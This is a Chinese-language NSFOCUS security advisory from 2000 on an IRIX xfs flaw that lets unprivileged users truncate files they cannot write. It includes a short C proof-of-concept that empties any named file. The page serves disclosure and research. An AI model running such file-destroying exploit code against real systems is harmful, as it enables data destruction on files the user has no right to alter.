NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

IRIX xfs truncate()系统调用权限检查漏洞

发布日期：2000-08-10
更新日期：2000-08-10

受影响系统：

    SGI IRIX 6.4
    SGI IRIX 6.3
    SGI IRIX 6.2

不受影响系统：

描述：

使用xfs文件系统的某些版本的IRIX操作系统，其truncate()系统调用在截断文件之
前未能正确地检查文件权限，使得非特权用户有可能损害那些本来他们不可写的文
件。也许不只上面列出的版本存在该漏洞。

<*来源： LSD (contact@lsd-pl.net ) *>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*## copyright LAST STAGE OF DELIRIUM feb 1997 poland        *://lsd-pl.net/ #*/
/*## truncate                                                                #*/
/*   truncates any file on a xfs filesystem                                   */

main ( int argc, char * argv[] )
{
    printf( "copyright LAST STAGE OF DELIRIUM feb 1997 poland   //lsd-pl.net\n" );
    printf( "truncate for irix 6.2 6.3 6.4 IP:all\n\n" );
    if ( argc != 2 )
    {
        printf( "usage: %s file\n", argv[0] );
        exit( -1 );
    }
    if ( !truncate( argv[1], 0 ) )
    {
        printf( "file %s truncated\n", argv[1] );
    }
    else
    {
        perror( "error" );
    }
}

建议：

暂无

浏览次数：5995
严重程度：0（网友投票）

本安全漏洞由绿盟科技翻译整理，版权所有，未经许可，不得转载
绿盟科技给您安全的保障

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客